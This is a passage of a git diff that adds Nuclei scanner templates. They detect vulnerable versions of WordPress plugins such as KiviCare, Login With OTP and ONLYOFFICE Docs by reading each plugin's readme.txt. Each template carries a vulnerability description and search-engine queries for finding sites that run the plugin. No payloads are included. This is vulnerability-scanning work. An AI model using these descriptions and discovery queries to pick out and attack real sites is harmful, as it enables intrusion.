+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c820ff17-718d-4e3a-9a46-7d5a4a573f78?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/multilevel-referral-plugin-for-woocommerce/"
+ google-query: inurl:"/wp-content/plugins/multilevel-referral-plugin-for-woocommerce/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,multilevel-referral-plugin-for-woocommerce,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/multilevel-referral-plugin-for-woocommerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "multilevel-referral-plugin-for-woocommerce"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.27')
\ No newline at end of file
diff --git a/poc/remote_code_execution/nextcart-woocommerce-migration-2e2806962d8874bbd69c8d26bf481248.yaml b/poc/remote_code_execution/nextcart-woocommerce-migration-2e2806962d8874bbd69c8d26bf481248.yaml
new file mode 100644
index 0000000000..1c8b868434
--- /dev/null
+++ b/poc/remote_code_execution/nextcart-woocommerce-migration-2e2806962d8874bbd69c8d26bf481248.yaml
@@ -0,0 +1,59 @@
+id: nextcart-woocommerce-migration-2e2806962d8874bbd69c8d26bf481248
+
+info:
+ name: >
+ Next-Cart Store to WooCommerce Migration <= 3.9.2 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/abcebcdb-e22a-4b6c-86db-f95b00260446?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/nextcart-woocommerce-migration/"
+ google-query: inurl:"/wp-content/plugins/nextcart-woocommerce-migration/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,nextcart-woocommerce-migration,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/nextcart-woocommerce-migration/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "nextcart-woocommerce-migration"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.9.2')
\ No newline at end of file
diff --git a/poc/remote_code_execution/ni-woocommerce-cost-of-goods-66898c5242c9d33ba57cb7fe04ac3a35.yaml b/poc/remote_code_execution/ni-woocommerce-cost-of-goods-66898c5242c9d33ba57cb7fe04ac3a35.yaml
new file mode 100644
index 0000000000..2bb0e1884d
--- /dev/null
+++ b/poc/remote_code_execution/ni-woocommerce-cost-of-goods-66898c5242c9d33ba57cb7fe04ac3a35.yaml
@@ -0,0 +1,59 @@
+id: ni-woocommerce-cost-of-goods-66898c5242c9d33ba57cb7fe04ac3a35
+
+info:
+ name: >
+ Ni WooCommerce Cost Of Goods <= 3.2.8 - Authenticated (Administrator+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/68846ab2-684c-40ad-8a91-0b7d9de1ecde?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/ni-woocommerce-cost-of-goods/"
+ google-query: inurl:"/wp-content/plugins/ni-woocommerce-cost-of-goods/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,ni-woocommerce-cost-of-goods,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ni-woocommerce-cost-of-goods/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ni-woocommerce-cost-of-goods"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.2.8')
\ No newline at end of file
diff --git a/poc/remote_code_execution/woocommerce-ultimate-gift-card-f2d90f9b034e1f97969a83011a928867.yaml b/poc/remote_code_execution/woocommerce-ultimate-gift-card-f2d90f9b034e1f97969a83011a928867.yaml
new file mode 100644
index 0000000000..58695dc7f5
--- /dev/null
+++ b/poc/remote_code_execution/woocommerce-ultimate-gift-card-f2d90f9b034e1f97969a83011a928867.yaml
@@ -0,0 +1,59 @@
+id: woocommerce-ultimate-gift-card-f2d90f9b034e1f97969a83011a928867
+
+info:
+ name: >
+ WooCommerce Ultimate Gift Card - Create, Sell and Manage Gift Cards with Customized Email Templates < 2.9.1 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/859e9233-1e5d-4430-87c1-bcd8225b6258?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/woocommerce-ultimate-gift-card/"
+ google-query: inurl:"/wp-content/plugins/woocommerce-ultimate-gift-card/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,woocommerce-ultimate-gift-card,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/woocommerce-ultimate-gift-card/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "woocommerce-ultimate-gift-card"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '< 2.9.1')
\ No newline at end of file
diff --git a/poc/search/spatialmatch-free-lifestyle-search-67ee26ea0af5450a37293a361423bdd3.yaml b/poc/search/spatialmatch-free-lifestyle-search-67ee26ea0af5450a37293a361423bdd3.yaml
new file mode 100644
index 0000000000..6cdaa60845
--- /dev/null
+++ b/poc/search/spatialmatch-free-lifestyle-search-67ee26ea0af5450a37293a361423bdd3.yaml
@@ -0,0 +1,59 @@
+id: spatialmatch-free-lifestyle-search-67ee26ea0af5450a37293a361423bdd3
+
+info:
+ name: >
+ SpatialMatch IDX <= 3.0.9 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4f406c82-14e7-468b-8bba-400aefe687b5?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/spatialmatch-free-lifestyle-search/"
+ google-query: inurl:"/wp-content/plugins/spatialmatch-free-lifestyle-search/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,spatialmatch-free-lifestyle-search,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/spatialmatch-free-lifestyle-search/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "spatialmatch-free-lifestyle-search"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.0.9')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-10874-7dbd16c02b43e8a0bfabb5ba2cd1028e.yaml b/poc/sql/CVE-2024-10874-7dbd16c02b43e8a0bfabb5ba2cd1028e.yaml
new file mode 100644
index 0000000000..44f464f0ce
--- /dev/null
+++ b/poc/sql/CVE-2024-10874-7dbd16c02b43e8a0bfabb5ba2cd1028e.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10874-7dbd16c02b43e8a0bfabb5ba2cd1028e
+
+info:
+ name: >
+ Quotes llama <= 3.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Quotes llama plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'quotes-llama' shortcode in all versions up to, and including, 3.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5e2f3abd-0a15-4bc1-966a-22d606f3e333?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-10874
+ metadata:
+ fofa-query: "wp-content/plugins/quotes-llama/"
+ google-query: inurl:"/wp-content/plugins/quotes-llama/"
+ shodan-query: 'vuln:CVE-2024-10874'
+ tags: cve,wordpress,wp-plugin,quotes-llama,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/quotes-llama/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "quotes-llama"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.0.0')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-11178-1d03d4b0d9125cf395a9b36a817c53db.yaml b/poc/sql/CVE-2024-11178-1d03d4b0d9125cf395a9b36a817c53db.yaml
new file mode 100644
index 0000000000..8a3dda0de2
--- /dev/null
+++ b/poc/sql/CVE-2024-11178-1d03d4b0d9125cf395a9b36a817c53db.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11178-1d03d4b0d9125cf395a9b36a817c53db
+
+info:
+ name: >
+ Login With OTP <= 1.4.2 - Authentication Bypass via Weak OTP
+ author: topscoder
+ severity: critical
+ description: >
+ The Login With OTP plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.4.2. This is due to the plugin generating too weak OTP, and there’s no attempt or time limit. This makes it possible for unauthenticated attackers to generate and brute force the 6-digit numeric OTP that makes it possible to log in as any existing user on the site, such as an administrator, if they have access to the email.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d3775d48-5985-475e-8fb9-c4c5fd044772?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.1
+ cve-id: CVE-2024-11178
+ metadata:
+ fofa-query: "wp-content/plugins/otp-login/"
+ google-query: inurl:"/wp-content/plugins/otp-login/"
+ shodan-query: 'vuln:CVE-2024-11178'
+ tags: cve,wordpress,wp-plugin,otp-login,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/otp-login/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "otp-login"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.2')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-11201-aa3d65db710ab72aee8e6c78d61fbc19.yaml b/poc/sql/CVE-2024-11201-aa3d65db710ab72aee8e6c78d61fbc19.yaml
new file mode 100644
index 0000000000..4f40bc9c2f
--- /dev/null
+++ b/poc/sql/CVE-2024-11201-aa3d65db710ab72aee8e6c78d61fbc19.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11201-aa3d65db710ab72aee8e6c78d61fbc19
+
+info:
+ name: >
+ myCred – Loyalty Points and Rewards plugin <= 2.7.5.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via mycred_send Shortcode
+ author: topscoder
+ severity: low
+ description: >
+ The myCred – Loyalty Points and Rewards plugin for WordPress and WooCommerce – Give Points, Ranks, Badges, Cashback, WooCommerce rewards, and WooCommerce credits for Gamification plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's mycred_send shortcode in all versions up to, and including, 2.7.5.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2d1d9bee-4afa-44cc-8e7a-8a73ad018c4a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11201
+ metadata:
+ fofa-query: "wp-content/plugins/mycred/"
+ google-query: inurl:"/wp-content/plugins/mycred/"
+ shodan-query: 'vuln:CVE-2024-11201'
+ tags: cve,wordpress,wp-plugin,mycred,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mycred/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mycred"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.7.5.2')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-11444-4063529e850dc8cdb770b409a5b563ef.yaml b/poc/sql/CVE-2024-11444-4063529e850dc8cdb770b409a5b563ef.yaml
new file mode 100644
index 0000000000..0d113c79a7
--- /dev/null
+++ b/poc/sql/CVE-2024-11444-4063529e850dc8cdb770b409a5b563ef.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11444-4063529e850dc8cdb770b409a5b563ef
+
+info:
+ name: >
+ CLUEVO LMS, E-Learning Platform <= 1.13.2 - Cross-Site Request Forgery to Module Deletion
+ author: topscoder
+ severity: medium
+ description: >
+ The CLUEVO LMS, E-Learning Platform plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.13.2. This is due to missing or incorrect nonce validation on the cluevo_render_module_ui() function. This makes it possible for unauthenticated attackers to delete modules via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2a3056d4-5ee9-4b31-9ef8-0e55f470ad23?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-11444
+ metadata:
+ fofa-query: "wp-content/plugins/cluevo-lms/"
+ google-query: inurl:"/wp-content/plugins/cluevo-lms/"
+ shodan-query: 'vuln:CVE-2024-11444'
+ tags: cve,wordpress,wp-plugin,cluevo-lms,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cluevo-lms/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cluevo-lms"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.13.2')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-11450-aa0eea523b63076daf425f6ddb400979.yaml b/poc/sql/CVE-2024-11450-aa0eea523b63076daf425f6ddb400979.yaml
new file mode 100644
index 0000000000..07e13f5eb2
--- /dev/null
+++ b/poc/sql/CVE-2024-11450-aa0eea523b63076daf425f6ddb400979.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11450-aa0eea523b63076daf425f6ddb400979
+
+info:
+ name: >
+ ONLYOFFICE Docs <= 2.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The ONLYOFFICE Docs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'onlyoffice' shortcode in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/80b71264-5b0f-41cb-86c1-a052d1976597?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11450
+ metadata:
+ fofa-query: "wp-content/plugins/onlyoffice/"
+ google-query: inurl:"/wp-content/plugins/onlyoffice/"
+ shodan-query: 'vuln:CVE-2024-11450'
+ tags: cve,wordpress,wp-plugin,onlyoffice,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/onlyoffice/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "onlyoffice"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.0')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-11728-2c0f50aa3db592d906a698b62cca69c7.yaml b/poc/sql/CVE-2024-11728-2c0f50aa3db592d906a698b62cca69c7.yaml
new file mode 100644
index 0000000000..c7755d3077
--- /dev/null
+++ b/poc/sql/CVE-2024-11728-2c0f50aa3db592d906a698b62cca69c7.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11728-2c0f50aa3db592d906a698b62cca69c7
+
+info:
+ name: >
+ KiviCare – Clinic & Patient Management System (EHR) <= 3.6.4 - Unauthenticated SQL Injection
+ author: topscoder
+ severity: critical
+ description: >
+ The KiviCare – Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to SQL Injection via the 'visit_type[service_id]' parameter of the tax_calculated_data AJAX action in all versions up to, and including, 3.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/53c18834-3026-4d4d-888b-add314a0e56e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2024-11728
+ metadata:
+ fofa-query: "wp-content/plugins/kivicare-clinic-management-system/"
+ google-query: inurl:"/wp-content/plugins/kivicare-clinic-management-system/"
+ shodan-query: 'vuln:CVE-2024-11728'
+ tags: cve,wordpress,wp-plugin,kivicare-clinic-management-system,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/kivicare-clinic-management-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "kivicare-clinic-management-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.6.4')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-11823-96487c8862c6208dac1f43cc4dba71e2.yaml b/poc/sql/CVE-2024-11823-96487c8862c6208dac1f43cc4dba71e2.yaml
new file mode 100644
index 0000000000..acfed4a378
--- /dev/null
+++ b/poc/sql/CVE-2024-11823-96487c8862c6208dac1f43cc4dba71e2.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11823-96487c8862c6208dac1f43cc4dba71e2
+
+info:
+ name: >
+ Folder Gallery <= 1.7.4 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Folder Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'foldergallery' shortcode in all versions up to, and including, 1.7.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b4521959-416e-4ff5-96c0-bc4dbb0187b7?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11823
+ metadata:
+ fofa-query: "wp-content/plugins/folder-gallery/"
+ google-query: inurl:"/wp-content/plugins/folder-gallery/"
+ shodan-query: 'vuln:CVE-2024-11823'
+ tags: cve,wordpress,wp-plugin,folder-gallery,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/folder-gallery/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "folder-gallery"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.7.4')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-39626-ad9b3818c747f1ed3832fbdce623db21.yaml b/poc/sql/CVE-2024-39626-ad9b3818c747f1ed3832fbdce623db21.yaml
new file mode 100644
index 0000000000..e491cf118e
--- /dev/null
+++ b/poc/sql/CVE-2024-39626-ad9b3818c747f1ed3832fbdce623db21.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-39626-ad9b3818c747f1ed3832fbdce623db21
+
+info:
+ name: >
+ Pretty Simple Popup Builder <= 1.0.9 - Authenticated (Administrator+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Pretty Simple Popup Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only impacts multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9489f066-5898-4908-b3aa-cf856958cb4e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-39626
+ metadata:
+ fofa-query: "wp-content/plugins/pretty-simple-popup-builder/"
+ google-query: inurl:"/wp-content/plugins/pretty-simple-popup-builder/"
+ shodan-query: 'vuln:CVE-2024-39626'
+ tags: cve,wordpress,wp-plugin,pretty-simple-popup-builder,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/pretty-simple-popup-builder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "pretty-simple-popup-builder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.9')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-53745-5b88f5f8304e8fddbc476a349ec52bdb.yaml b/poc/sql/CVE-2024-53745-5b88f5f8304e8fddbc476a349ec52bdb.yaml
new file mode 100644
index 0000000000..a489ebd6fd
--- /dev/null
+++ b/poc/sql/CVE-2024-53745-5b88f5f8304e8fddbc476a349ec52bdb.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53745-5b88f5f8304e8fddbc476a349ec52bdb
+
+info:
+ name: >
+ 소셜 공유 버튼 By 코스모스팜 <= 1.9 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The 소셜 공유 버튼 By 코스모스팜 plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b4540b21-ef63-4cd2-b605-c66a7b76934f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53745
+ metadata:
+ fofa-query: "wp-content/plugins/cosmosfarm-share-buttons/"
+ google-query: inurl:"/wp-content/plugins/cosmosfarm-share-buttons/"
+ shodan-query: 'vuln:CVE-2024-53745'
+ tags: cve,wordpress,wp-plugin,cosmosfarm-share-buttons,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cosmosfarm-share-buttons/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cosmosfarm-share-buttons"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.9')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-53759-dbad57d1fe7a81773ada836f186bcbb3.yaml b/poc/sql/CVE-2024-53759-dbad57d1fe7a81773ada836f186bcbb3.yaml
new file mode 100644
index 0000000000..132f83f96a
--- /dev/null
+++ b/poc/sql/CVE-2024-53759-dbad57d1fe7a81773ada836f186bcbb3.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53759-dbad57d1fe7a81773ada836f186bcbb3
+
+info:
+ name: >
+ ArCa Payment Gateway <= 1.3.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The ArCa Payment Gateway plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
